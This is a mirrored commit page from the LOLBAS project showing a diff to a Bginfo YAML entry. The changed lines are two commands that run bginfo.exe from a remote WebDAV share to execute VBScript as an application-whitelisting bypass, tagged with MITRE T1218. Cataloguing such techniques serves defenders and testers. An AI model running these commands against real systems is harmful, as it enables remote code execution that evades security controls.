public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

minor adjustments

Browse Source
This commit is contained in:
Oddvar Moe
2018-09-25 02:33:38 +02:00
parent a2db5dca8c
commit 7961a99173
2 changed files with 227 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
yml/OtherMSBinaries/Bginfo.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: AWL Bypass
@@ -20,7 +20,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Category: AWL Bypass
@@ -30,8 +30,10 @@ Commands:
OperatingSystem: Windows
Full Path:
- No fixed path
Code Sample: []
Detection: []
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Acknowledgement: